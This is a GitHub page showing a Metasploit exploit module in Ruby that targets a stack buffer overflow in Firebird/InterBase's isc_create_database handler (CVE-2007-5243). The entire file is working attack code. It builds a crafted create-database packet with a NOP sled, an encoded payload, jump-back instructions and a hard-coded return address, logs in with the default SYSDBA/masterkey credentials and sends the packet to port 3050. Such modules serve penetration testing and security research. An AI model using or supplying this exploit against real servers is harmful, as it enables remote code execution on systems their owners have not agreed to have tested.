-
Notifications
You must be signed in to change notification settings - Fork 0
/
fb_isc_create_database.rb
172 lines (130 loc) · 3.6 KB
/
fb_isc_create_database.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::BruteTargets
def initialize(info = {})
super(update_info(info,
'Name' => 'Firebird Relational Database isc_create_database() Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Borland InterBase
by sending a specially crafted create request.
},
'Author' =>
[
'Ramon de C Valle',
'Adriano Lima <adriano[at]risesecurity.org>',
],
'Arch' => ARCH_X86,
'Platform' => 'win',
'References' =>
[
[ 'CVE', '2007-5243' ],
[ 'OSVDB', '38606' ],
[ 'BID', '25917' ],
[ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ],
],
'Privileged' => true,
'License' => MSF_LICENSE,
'Payload' =>
{
'Space' => 512,
'BadChars' => "\x00\x2f\x3a\x40\x5c",
'StackAdjustment' => -3500,
},
'Targets' =>
[
[ 'Brute Force', { } ],
# '\Device\HarddiskVolume1\WINDOWS\system32\unicode.nls'
[
'Firebird WI-V2.0.0.12748 WI-V2.0.1.12855 (unicode.nls)',
{ 'Length' => [ 756 ], 'Ret' => 0x00370b0b }
],
# Debug
[
'Debug',
{ 'Length' => [ 756 ], 'Ret' => 0xaabbccdd }
],
],
'DefaultTarget' => 1,
'DisclosureDate' => '2007-10-03'
))
register_options(
[
Opt::RPORT(3050)
])
end
# Create database parameter block
def dpb_create
isc_dpb_user_name = 28
isc_dpb_password = 29
isc_dpb_version1 = 1
user = 'SYSDBA'
pass = 'masterkey'
dpb = ''
dpb << [isc_dpb_version1].pack('c')
dpb << [isc_dpb_user_name].pack('c')
dpb << [user.length].pack('c')
dpb << user
dpb << [isc_dpb_password].pack('c')
dpb << [pass.length].pack('c')
dpb << pass
dpb
end
# Calculate buffer padding
def buf_padding(length = '')
remainder = length.remainder(4)
padding = 0
if remainder > 0
padding = (4 - remainder)
end
padding
end
def exploit_target(target)
target['Length'].each do |length|
connect
# Create database
op_create = 20
# Extra padding to trigger the exception
extra_padding = 1024 * 16
buf = ''
# Operation/packet type
buf << [op_create].pack('N')
# Id
buf << [0].pack('N')
# Length
buf << [length + extra_padding].pack('N')
# Nop block
buf << make_nops(length - payload.encoded.length - 13)
# Payload
buf << payload.encoded
# Jump back into the nop block
buf << "\xe9" + [-516].pack('V')
# Jump back
buf << "\xeb" + [-7].pack('c')
# Random alpha data
buf << rand_text_alpha(2)
# Target
buf << [target.ret].pack('V')
# Random alpha data
buf << rand_text_alpha(extra_padding)
# Padding
buf << "\x00" * buf_padding(length + extra_padding)
# Database parameter block
# Create database parameter block
dpb = dpb_create
# Database parameter block length
buf << [dpb.length].pack('N')
# Database parameter block
buf << dpb
# Padding
buf << "\x00" * buf_padding(dpb.length)
sock.put(buf)
select(nil,nil,nil,4)
handler
end
end
end